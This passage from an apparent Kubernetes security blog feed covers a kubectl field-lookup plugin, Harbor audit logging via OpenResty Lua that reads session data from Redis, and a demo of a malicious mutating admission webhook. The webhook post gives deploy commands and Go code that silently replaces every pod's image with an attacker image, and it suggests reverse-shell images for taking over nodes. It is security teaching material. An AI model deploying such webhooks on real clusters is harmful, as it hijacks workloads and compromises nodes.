         runAsUser    &lt;integer&gt;
         seLinuxOptions    &lt;Object&gt;
            level    &lt;string&gt;
            role    &lt;string&gt;
            type    &lt;string&gt;
            user    &lt;string&gt;
         windowsOptions    &lt;Object&gt;
            gmsaCredentialSpec    &lt;string&gt;
            gmsaCredentialSpecName    &lt;string&gt;
      stdin    &lt;boolean&gt;
      stdinOnce    &lt;boolean&gt;
      terminationMessagePath    &lt;string&gt;
      terminationMessagePolicy    &lt;string&gt;
      tty    &lt;boolean&gt;
      volumeDevices    &lt;[]Object&gt;
         devicePath    &lt;string&gt;
         name    &lt;string&gt;
      volumeMounts    &lt;[]Object&gt;
         mountPath    &lt;string&gt;
         mountPropagation    &lt;string&gt;
         name    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         subPath    &lt;string&gt;
         subPathExpr    &lt;string&gt;
      workingDir    &lt;string&gt;
   dnsConfig    &lt;Object&gt;
      nameservers    &lt;[]string&gt;
      options    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
      searches    &lt;[]string&gt;
   dnsPolicy    &lt;string&gt;
   enableServiceLinks    &lt;boolean&gt;
   hostAliases    &lt;[]Object&gt;
      hostnames    &lt;[]string&gt;
      ip    &lt;string&gt;
   hostIPC    &lt;boolean&gt;
   hostNetwork    &lt;boolean&gt;
   hostPID    &lt;boolean&gt;
   hostname    &lt;string&gt;
   imagePullSecrets    &lt;[]Object&gt;
      name    &lt;string&gt;
   initContainers    &lt;[]Object&gt;
      args    &lt;[]string&gt;
      command    &lt;[]string&gt;
      env    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
         valueFrom    &lt;Object&gt;
            configMapKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            fieldRef    &lt;Object&gt;
               apiVersion    &lt;string&gt;
               fieldPath    &lt;string&gt;
            resourceFieldRef    &lt;Object&gt;
               containerName    &lt;string&gt;
               divisor    &lt;string&gt;
               resource    &lt;string&gt;
            secretKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
      envFrom    &lt;[]Object&gt;
         configMapRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
         prefix    &lt;string&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
      image    &lt;string&gt;
      imagePullPolicy    &lt;string&gt;
      lifecycle    &lt;Object&gt;
         postStart    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
         preStop    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
      livenessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      name    &lt;string&gt;
      ports    &lt;[]Object&gt;
         containerPort    &lt;integer&gt;
         hostIP    &lt;string&gt;
         hostPort    &lt;integer&gt;
         name    &lt;string&gt;
         protocol    &lt;string&gt;
      readinessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      resources    &lt;Object&gt;
         limits    &lt;map[string]string&gt;
         requests    &lt;map[string]string&gt;
      securityContext    &lt;Object&gt;
         allowPrivilegeEscalation    &lt;boolean&gt;
         capabilities    &lt;Object&gt;
            add    &lt;[]string&gt;
            drop    &lt;[]string&gt;
         privileged    &lt;boolean&gt;
         procMount    &lt;string&gt;
         readOnlyRootFilesystem    &lt;boolean&gt;
         runAsGroup    &lt;integer&gt;
         runAsNonRoot    &lt;boolean&gt;
         runAsUser    &lt;integer&gt;
         seLinuxOptions    &lt;Object&gt;
            level    &lt;string&gt;
            role    &lt;string&gt;
            type    &lt;string&gt;
            user    &lt;string&gt;
         windowsOptions    &lt;Object&gt;
            gmsaCredentialSpec    &lt;string&gt;
            gmsaCredentialSpecName    &lt;string&gt;
      stdin    &lt;boolean&gt;
      stdinOnce    &lt;boolean&gt;
      terminationMessagePath    &lt;string&gt;
      terminationMessagePolicy    &lt;string&gt;
      tty    &lt;boolean&gt;
      volumeDevices    &lt;[]Object&gt;
         devicePath    &lt;string&gt;
         name    &lt;string&gt;
      volumeMounts    &lt;[]Object&gt;
         mountPath    &lt;string&gt;
         mountPropagation    &lt;string&gt;
         name    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         subPath    &lt;string&gt;
         subPathExpr    &lt;string&gt;
      workingDir    &lt;string&gt;
   nodeName    &lt;string&gt;
   nodeSelector    &lt;map[string]string&gt;
   preemptionPolicy    &lt;string&gt;
   priority    &lt;integer&gt;
   priorityClassName    &lt;string&gt;
   readinessGates    &lt;[]Object&gt;
      conditionType    &lt;string&gt;
   restartPolicy    &lt;string&gt;
   runtimeClassName    &lt;string&gt;
   schedulerName    &lt;string&gt;
   securityContext    &lt;Object&gt;
      fsGroup    &lt;integer&gt;
      runAsGroup    &lt;integer&gt;
      runAsNonRoot    &lt;boolean&gt;
      runAsUser    &lt;integer&gt;
      seLinuxOptions    &lt;Object&gt;
         level    &lt;string&gt;
         role    &lt;string&gt;
         type    &lt;string&gt;
         user    &lt;string&gt;
      supplementalGroups    &lt;[]integer&gt;
      sysctls    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
      windowsOptions    &lt;Object&gt;
         gmsaCredentialSpec    &lt;string&gt;
         gmsaCredentialSpecName    &lt;string&gt;
   serviceAccount    &lt;string&gt;
   serviceAccountName    &lt;string&gt;
   shareProcessNamespace    &lt;boolean&gt;
   subdomain    &lt;string&gt;
   terminationGracePeriodSeconds    &lt;integer&gt;
   tolerations    &lt;[]Object&gt;
      effect    &lt;string&gt;
      key    &lt;string&gt;
      operator    &lt;string&gt;
      tolerationSeconds    &lt;integer&gt;
      value    &lt;string&gt;
   volumes    &lt;[]Object&gt;
      awsElasticBlockStore    &lt;Object&gt;
         fsType    &lt;string&gt;
         partition    &lt;integer&gt;
         readOnly    &lt;boolean&gt;
         volumeID    &lt;string&gt;
      azureDisk    &lt;Object&gt;
         cachingMode    &lt;string&gt;
         diskName    &lt;string&gt;
         diskURI    &lt;string&gt;
         fsType    &lt;string&gt;
         kind    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      azureFile    &lt;Object&gt;
         readOnly    &lt;boolean&gt;
         secretName    &lt;string&gt;
         shareName    &lt;string&gt;
      cephfs    &lt;Object&gt;
         monitors    &lt;[]string&gt;
         path    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretFile    &lt;string&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         user    &lt;string&gt;
      cinder    &lt;Object&gt;
         fsType    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         volumeID    &lt;string&gt;
      configMap    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         items    &lt;[]Object&gt;
            key    &lt;string&gt;
            mode    &lt;integer&gt;
            path    &lt;string&gt;
         name    &lt;string&gt;
         optional    &lt;boolean&gt;
      csi    &lt;Object&gt;
         driver    &lt;string&gt;
         fsType    &lt;string&gt;
         nodePublishSecretRef    &lt;Object&gt;
            name    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         volumeAttributes    &lt;map[string]string&gt;
      downwardAPI    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         items    &lt;[]Object&gt;
            fieldRef    &lt;Object&gt;
               apiVersion    &lt;string&gt;
               fieldPath    &lt;string&gt;
            mode    &lt;integer&gt;
            path    &lt;string&gt;
            resourceFieldRef    &lt;Object&gt;
               containerName    &lt;string&gt;
               divisor    &lt;string&gt;
               resource    &lt;string&gt;
      emptyDir    &lt;Object&gt;
         medium    &lt;string&gt;
         sizeLimit    &lt;string&gt;
      fc    &lt;Object&gt;
         fsType    &lt;string&gt;
         lun    &lt;integer&gt;
         readOnly    &lt;boolean&gt;
         targetWWNs    &lt;[]string&gt;
         wwids    &lt;[]string&gt;
      flexVolume    &lt;Object&gt;
         driver    &lt;string&gt;
         fsType    &lt;string&gt;
         options    &lt;map[string]string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
      flocker    &lt;Object&gt;
         datasetName    &lt;string&gt;
         datasetUUID    &lt;string&gt;
      gcePersistentDisk    &lt;Object&gt;
         fsType    &lt;string&gt;
         partition    &lt;integer&gt;
         pdName    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      gitRepo    &lt;Object&gt;
         directory    &lt;string&gt;
         repository    &lt;string&gt;
         revision    &lt;string&gt;
      glusterfs    &lt;Object&gt;
         endpoints    &lt;string&gt;
         path    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      hostPath    &lt;Object&gt;
         path    &lt;string&gt;
         type    &lt;string&gt;
      iscsi    &lt;Object&gt;
         chapAuthDiscovery    &lt;boolean&gt;
         chapAuthSession    &lt;boolean&gt;
         fsType    &lt;string&gt;
         initiatorName    &lt;string&gt;
         iqn    &lt;string&gt;
         iscsiInterface    &lt;string&gt;
         lun    &lt;integer&gt;
         portals    &lt;[]string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         targetPortal    &lt;string&gt;
      name    &lt;string&gt;
      nfs    &lt;Object&gt;
         path    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         server    &lt;string&gt;
      persistentVolumeClaim    &lt;Object&gt;
         claimName    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      photonPersistentDisk    &lt;Object&gt;
         fsType    &lt;string&gt;
         pdID    &lt;string&gt;
      portworxVolume    &lt;Object&gt;
         fsType    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         volumeID    &lt;string&gt;
      projected    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         sources    &lt;[]Object&gt;
            configMap    &lt;Object&gt;
               items    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  mode    &lt;integer&gt;
                  path    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            downwardAPI    &lt;Object&gt;
               items    &lt;[]Object&gt;
                  fieldRef    &lt;Object&gt;
                     apiVersion    &lt;string&gt;
                     fieldPath    &lt;string&gt;
                  mode    &lt;integer&gt;
                  path    &lt;string&gt;
                  resourceFieldRef    &lt;Object&gt;
                     containerName    &lt;string&gt;
                     divisor    &lt;string&gt;
                     resource    &lt;string&gt;
            secret    &lt;Object&gt;
               items    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  mode    &lt;integer&gt;
                  path    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            serviceAccountToken    &lt;Object&gt;
               audience    &lt;string&gt;
               expirationSeconds    &lt;integer&gt;
               path    &lt;string&gt;
      quobyte    &lt;Object&gt;
         group    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         registry    &lt;string&gt;
         tenant    &lt;string&gt;
         user    &lt;string&gt;
         volume    &lt;string&gt;
      rbd    &lt;Object&gt;
         fsType    &lt;string&gt;
         image    &lt;string&gt;
         keyring    &lt;string&gt;
         monitors    &lt;[]string&gt;
         pool    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         user    &lt;string&gt;
      scaleIO    &lt;Object&gt;
         fsType    &lt;string&gt;
         gateway    &lt;string&gt;
         protectionDomain    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         sslEnabled    &lt;boolean&gt;
         storageMode    &lt;string&gt;
         storagePool    &lt;string&gt;
         system    &lt;string&gt;
         volumeName    &lt;string&gt;
      secret    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         items    &lt;[]Object&gt;
            key    &lt;string&gt;
            mode    &lt;integer&gt;
            path    &lt;string&gt;
         optional    &lt;boolean&gt;
         secretName    &lt;string&gt;
      storageos    &lt;Object&gt;
         fsType    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         volumeName    &lt;string&gt;
         volumeNamespace    &lt;string&gt;
      vsphereVolume    &lt;Object&gt;
         fsType    &lt;string&gt;
         storagePolicyID    &lt;string&gt;
         storagePolicyName    &lt;string&gt;</code>
</details>

<p>Scrolling through this output is tedious and time-consuming. If the same field name appears under multiple objects, the situation only gets worse.</p>
<h3 id="heading-proposed-solution-kubectl-fields">Proposed solution: kubectl-fields</h3>
<p>I leveraged the <em>kubectl plugins</em> feature &amp; built a plugin to demonstrate an alternative approach to this problem.</p>
<p><code>kubectl explain --recursive | grep</code> doesn’t show the exact hierarchy of matched fields, but this plugin does! <code>kubectl fields</code> solves this problem by printing a one-liner parental hierarchy of any field in any selected resource.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622198111500/Dzy4aKMo2.png" alt="kubectl-fields.png" /></p>
<pre><code class="lang-bash">$ kubectl fields po capabilities
spec.containers.securityContext.capabilities
spec.ephemeralContainers.securityContext.capabilities
spec.initContainers.securityContext.capabilities
</code></pre>
<pre><code class="lang-bash">$ kubectl fields po.spec securitycontext
containers.securityContext
ephemeralContainers.securityContext
initContainers.securityContext
securityContext
</code></pre>
<h3 id="heading-bonus">Bonus</h3>
<p><code>kubectl fields</code> is now integrated with <a target="_blank" href="https://github.com/kubernetes-sigs/krew">krew</a>, the kubectl plugin manager, and works on all platforms, so it can be installed directly with krew. It’s as simple as,</p>
<pre><code class="lang-bash">kubectl krew install fields
</code></pre>
<p>Huge thanks to <a target="_blank" href="https://twitter.com/ahmetb">ahmetb</a> for the krew integration suggestion.</p>
<p><strong>References</strong></p>
<p> <a target="_blank" href="https://github.com/rewanthtammana/kubectl-fields">https://github.com/rewanthtammana/kubectl-fields</a> </p>
]]></content:encoded></item><item><title><![CDATA[Enhancing the security audit logging of Harbor with OpenResty]]></title><description><![CDATA[TL;DR
In this blog post, we will be looking at some of the problems I have seen in Harbor private registry security audit logging with some possible solutions to meet security standards and requirements and finally, how I achieved the goal by leverag...]]></description><link>https://blog.rewanthtammana.com/enhancing-the-security-audit-logging-of-harbor-with-openresty</link><guid isPermaLink="true">https://blog.rewanthtammana.com/enhancing-the-security-audit-logging-of-harbor-with-openresty</guid><category><![CDATA[automation]]></category><category><![CDATA[containers]]></category><category><![CDATA[Redis]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Fri, 27 Aug 2021 07:45:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1630148527145/Wz_hPg-Jr.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-tldr">TL;DR</h3>
<p>In this blog post, we will look at some of the problems I have seen with security audit logging in the Harbor private registry, some possible solutions to meet security standards and compliance requirements, and finally how I achieved the goal by leveraging OpenResty's scripting abilities to perform better security audit logging.</p>
<p>By the end of this post, you will be able to enable security audit logging for your Harbor private registry and meet security compliance requirements for your container registry environment.</p>
<h3 id="heading-what-is-harbor">What is Harbor?</h3>
<p>Before we deep dive into the problems and solutions, let’s take a quick look at Harbor and how companies use it.</p>
<blockquote>
<p>Harbor is an open-source registry that secures artifacts with policies and role-based access control, ensures images are scanned and free from vulnerabilities, and signs images as trusted. Harbor, a CNCF Graduated project, delivers compliance, performance, and interoperability to help you consistently and securely manage artifacts across cloud-native compute platforms like Kubernetes and Docker.
— https://goharbor.io/</p>
</blockquote>
<h3 id="heading-problems-we-have-with-harbor-the-why">Problems we have with Harbor  — The Why?</h3>
<p>I think Harbor is a great open-source project and it already solves most of the problems in the work I do, but when it comes to security standards and compliance requirements, it doesn't have a mechanism for audit logging. Most compliance standards demand visibility and audit trails to understand who did what, when, and how. We want similar visibility in Harbor, so we can tell who accessed the registry, modified scan settings, tagged images, etc.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629644406463/_CYiwCsvc.png" alt="Harbor-default-logging.png" /></p>
<blockquote>
<p>The current logs don't explain who is making changes &amp; what is being modified. It's a huge setback &amp; a showstopper.</p>
</blockquote>
<p>As the container registry is one of the key pieces of supply chain security, it becomes even more critical to understand what’s happening through visibility and proactive monitoring.</p>
<h3 id="heading-here-are-some-possible-solutions-i-came-up-with">Here are some possible solutions I came up with</h3>
<p>With a clear problem statement in hand, I started tinkering with existing and possible solutions. Some of the options to solve this problem include:</p>
<ul>
<li>Adding custom middleware to harbor-core to implement the required security audit logging</li>
<li>Customizing the Harbor codebase to add new logging modules at the individual microservice level</li>
<li>Adding customized event controllers to Harbor for logging</li>
</ul>
<h3 id="heading-current-workflow">Current workflow</h3>
<p>Harbor spins up 11+ microservices on start-up. Nginx acts as a reverse proxy &amp; forwards the requests to respective components. All the logging happens at the Nginx level.</p>
<ul>
<li>Step 0: User request comes &amp; audit logging happens at Nginx</li>
<li>Step 1: Request goes to Harbor core MS from Nginx MS</li>
<li>Step 2: Harbor core MS communicates with serialized Redis for authentication checks</li>
<li>Step 3: Harbor core MS validates the authentication</li>
<li>Step 4: Harbor core MS connects with Harbor DB (Postgres) for authorization checks</li>
<li>Step 5: Harbor core MS validates the authorization</li>
<li>Step 6: Rest of the magic happens!</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629466236081/DD2wuKbM2.png" alt="rewanthtammana-Harbor-default-flow.png" /></p>
<h4 id="heading-default-log-format-configuration">Default log format configuration</h4>
<pre><code class="lang-apacheconf">  <span class="hljs-attribute">log_format</span> timed_combined '$remote_addr - '
    '"$<span class="hljs-attribute">request</span><span class="hljs-string">" $status $body_bytes_sent '
    '"</span>$http_referer<span class="hljs-string">" "</span>$http_user_agent<span class="hljs-string">" '
    '$request_time $upstream_response_time $pipe';</span>
</code></pre>
<p>With the default configuration &amp; workflow, there's no way for Nginx to log the user information just from the HTTP requests. All the Authentication &amp; Authorization checks happen after the request passes the Nginx stage. To solve this problem, we need to fetch user information at the Nginx level.</p>
<h3 id="heading-solution-for-the-problem-i-have-chosen-the-how">Solution for the problem I have chosen  — The How?</h3>
<p>Here comes the exciting part. I delved into pretty much all the possible solutions, but due to the constraints I have (time, smooth upgrades), I chose to go this way.</p>
<p>We will replace Nginx with OpenResty, query the Redis key-value store to fetch user information, pass it to the proxy, and save it to the logs.</p>
<p>Some considerations I have to keep an eye on with this solution include:</p>
<p>A slight increase in latency due to the extra calls at the proxy level. The latency won't be noticeable until we have massive traffic.</p>
<h3 id="heading-solution-for-the-problem-technicalities">Solution for the problem —  Technicalities</h3>
<p>Though Nginx is powerful software, it lacks programming ability. We need to add programming capabilities to Nginx so it can communicate with the Redis MS and fetch user information. To perform these operations, we replace Nginx with OpenResty, which has Lua scripting abilities.</p>
<p>With Lua, we can query the Redis cache, extract the user details from the serialized session data, store them in the logs at the reverse proxy level, and forward the request onward for the rest of the operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629466401602/u6Gn1Fp4l.png" alt="rewanthtammana-Harbor-enhanced-flow.png" /></p>
<p>The enhanced workflow sequence:</p>
<ul>
<li>Step 1: At the Openresty level, we extract the cookies from the user request</li>
<li>Step 2: We extract the <code>sid</code> session identifier from the cookies</li>
<li>Step 3: We fetch the serialized data associated with <code>sid</code> from the Redis key-value store (see the sketch after this list)</li>
<li>Step 4: Extract Email ID from the serialized data</li>
<li>Step 5: Add Email ID to rest of the logging parameters &amp; store it in reverse proxy logs</li>
<li>Step 6: Forward the initial user request to other MS to do the magic!</li>
</ul>
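<p>To make the lookup in step 3 concrete, it can be sanity-checked by hand against the Harbor Redis instance before writing any Lua. This is only a rough sketch; the host, port and key format are assumptions and will differ depending on how your Harbor deployment stores sessions:</p>
<pre><code class="lang-bash"># Hypothetical manual check of what the Lua code automates.
# Host, port and key pattern are assumptions -- inspect your own Redis instance.
SID="&lt;value of the sid cookie from the browser&gt;"
redis-cli -h harbor-redis -p 6379 KEYS "*${SID}*"       # locate the session key
redis-cli -h harbor-redis -p 6379 GET "&lt;matched-key&gt;"   # dump the serialized session blob
</code></pre>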
<h4 id="heading-enhanced-logging-configuration">Enhanced logging configuration</h4>
<p>Along with a bunch of other Lua codes, <a target="_blank" href="https://github.com/rewanthtammana/harbor-logging/blob/master/make/common/config/nginx-custom/lua/user.lua">here</a>, a considerable upgrade has been performed in the logging conf, <a target="_blank" href="https://github.com/rewanthtammana/harbor-logging/blob/master/make/common/config/nginx-custom/conf/nginx.conf">here</a></p>
<pre><code class="lang-apacheconf">  ...
  <span class="hljs-attribute">location</span> / {
    ...
    <span class="hljs-attribute">default_type</span> text/plain;
    <span class="hljs-attribute">access_by_lua_block</span> {
      <span class="hljs-attribute">local</span> user = require <span class="hljs-string">"user"</span>
      <span class="hljs-attribute">local</span> redis = require <span class="hljs-string">"resty.redis"</span>
      <span class="hljs-attribute">local</span> red = redis:new()

      <span class="hljs-attribute">ngx</span>.var.email=user.fetch(red, ngx.var.cookie_sid)
    }
  }
  ...
  <span class="hljs-attribute">log_format</span> timed_combined escape=none '($email) $remote_addr - '
  '"$<span class="hljs-attribute">request</span><span class="hljs-string">" $status $body_bytes_sent '
  '"</span>$http_referer<span class="hljs-string">" "</span>$http_user_agent<span class="hljs-string">" '
  '$request_time $upstream_response_time $pipe'
  '$request_body';</span>
</code></pre>
<blockquote>
<p>With the customized configuration changes above, we can see the request body &amp; the email ID of the user in the logs.</p>
</blockquote>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629644556197/8ItDj2avW.png" alt="Harbor-enhanced-logging.png" /></p>
<h3 id="heading-the-long-why-i-didnt-choose-other-solutions">The long why I didn’t choose other solutions</h3>
<p>I wanted a solution that solves our problem &amp; also allows us to perform smooth upgrades. If we choose to tamper with the Harbor codebase, then until our code gets merged into the main branch, we will face massive issues upgrading Harbor to the latest version.</p>
<h3 id="heading-conclusionsummary">Conclusion/Summary</h3>
<p>I have tried to solve a problem that has existed since Harbor's inception by replacing the Nginx proxy on Photon OS with OpenResty, adding Lua scripting to query the Redis cache for the serialized session data by session ID, deserializing that data to fetch the user information, saving it in the logs, and then forwarding the request to the harbor-core microservice for the regular flow execution.</p>
<p><strong>NOTE:</strong> This solution is definitely not a production level fix &amp; this blog is to just demonstrate the things I tried &amp; learnt in the process of fixing the issue.</p>
<p><strong>Github - </strong> <a target="_blank" href="https://github.com/rewanthtammana/harbor-enhanced-logging">https://github.com/rewanthtammana/harbor-enhanced-logging</a></p>
]]></content:encoded></item><item><title><![CDATA[Creating Malicious Admission Controllers]]></title><description><![CDATA[Admission controllers play a crucial role in Kubernetes & are leveraged by multiple tools & teams to defend the clusters. A simple misconfiguration in the setup allows attackers to effortlessly leverage this defensive feature to perform offensive att...]]></description><link>https://blog.rewanthtammana.com/creating-malicious-admission-controllers</link><guid isPermaLink="true">https://blog.rewanthtammana.com/creating-malicious-admission-controllers</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[automation]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Mon, 09 Aug 2021 12:59:32 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1628434305471/vvSyjEXQxy.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Admission controllers play a crucial role in Kubernetes &amp; are leveraged by multiple tools &amp; teams to defend the clusters. A simple misconfiguration in the setup allows attackers to effortlessly leverage this defensive feature to perform offensive attacks. In this article, we will create a malicious admission controller, understand the technicalities, and analyze its impact.</p>
<p><a target="_blank" href="https://www.stackrox.com/">Stackrox</a> has done an amazing job of demonstrating the usage of admission controllers to defend the Kubernetes clusters. We will modify their code to demonstrate an offensive attack scenario.</p>
<h3 id="heading-introduction-to-admission-controllers">Introduction to admission controllers</h3>
<blockquote>
<p>An admission controller is a piece of code that intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized. </p>
</blockquote>
<h3 id="heading-workflow-andamp-types-of-controllers">Workflow &amp; Types of controllers:</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1628339222090/iyOrDsdV0.png" alt="image.png" /></p>
<ul>
<li>MutatingAdmissionWebhook (modifies the object if it desires)</li>
<li>ValidatingAdmissionWebhook (validates the object if it desires)</li>
</ul>
<p>If either of the controllers rejects the request, the entire request is rejected immediately and an error is returned to the end-user.</p>
<h3 id="heading-uses-of-admission-controller">Uses of admission controller</h3>
<p>Tools like OPA, Kyverno, and many others leverage admission controllers to enforce more security.</p>
<ul>
<li>Limit requests to create, delete, modify, and other specific operations</li>
<li>Allows enforcing granular rules</li>
<li>Highly effective in hardening Kubernetes clusters</li>
</ul>
<h3 id="heading-exploitation">Exploitation</h3>
<p>Admission controllers are built to defend the systems &amp; harden the infrastructure but a simple misconfiguration can lead to nightmares &amp; deadly attacks.</p>
<h3 id="heading-creating-malicious-admission-controller">Creating malicious admission controller</h3>
<p>Once an attacker gets into a misconfigured cluster, they can perform any number of operations. If the attacker has privileges to create a deployment, a service &amp; a mutating webhook admission controller, then it's pretty much game over. Hence, exploiting admission controllers can be categorized as part of the post-exploitation phase.</p>
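<p>Before attempting this, an attacker (or a defender auditing their own RBAC) can simply ask the API server whether the current identity holds those privileges. A quick check with standard kubectl commands:</p>
<pre><code class="lang-bash"># Returns "yes" or "no" for the identity in the current kubeconfig/token
kubectl auth can-i create deployments
kubectl auth can-i create services
kubectl auth can-i create mutatingwebhookconfigurations
</code></pre>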
<p>The source code of the demo is available, <a target="_blank" href="https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo">here</a>.</p>
<pre><code class="lang-bash">git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
<span class="hljs-built_in">cd</span> malicious-admission-controller-webhook-demo
./deploy.sh
kubectl get po -n webhook-demo -w
</code></pre>
<p>Wait until the webhook server is ready. Check the status.</p>
<pre><code class="lang-bash">kubectl get mutatingwebhookconfigurations
kubectl get deploy,svc -n webhook-demo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png" alt="mutating-webhook-status-check.PNG" /></p>
<p>Once we have our malicious mutating webhook running, let's deploy a new pod.</p>
<pre><code class="lang-bash">kubectl run nginx --image nginx
kubectl get po -w
</code></pre>
<p>Wait again until you see the pod status change. Now you can see an <code>ErrImagePull</code> error. Check the image name with either of these queries.</p>
<pre><code class="lang-bash">kubectl get po nginx -o=jsonpath=<span class="hljs-string">'{.spec.containers[].image}{"\n"}'</span>
</code></pre>
<pre><code class="lang-bash">kubectl describe po nginx | grep <span class="hljs-string">"Image: "</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png" alt="malicious-admission-controller.PNG" /></p>
<p>As you can see in the above image, we tried running image <code>nginx</code> but the final executed image is <code>rewanthtammana/malicious-image</code>. What just happened!!?</p>
<h3 id="heading-technicalities">Technicalities</h3>
<p>Let's unfold what just happened. The <code>./deploy.sh</code> script that you executed created a mutating webhook admission controller. The lines below from the webhook's code are responsible for the above result.</p>
<pre><code class="lang-golang">patches = <span class="hljs-built_in">append</span>(patches, patchOperation{
    Op:    <span class="hljs-string">"replace"</span>,
    Path:  <span class="hljs-string">"/spec/containers/0/image"</span>,
    Value: <span class="hljs-string">"rewanthtammana/malicious-image"</span>,
})
</code></pre>
<p>The above snippet replaces the first container image in every pod with <code>rewanthtammana/malicious-image</code>. </p>
<h3 id="heading-example-attack-scenario">Example attack scenario</h3>
<p>An attacker can perform various attacks. For instance,</p>
<ul>
<li>Run pods/deployments with privileged flags, high capabilities, etc.</li>
<li>Use a custom image that throws a reverse shell from every pod back to the attacker's machine.</li>
</ul>
<p>By combining the above two threat vectors, attackers can gain access to all worker nodes by getting reverse shells from pods running with high privileges.</p>
<h3 id="heading-conclusion">Conclusion</h3>
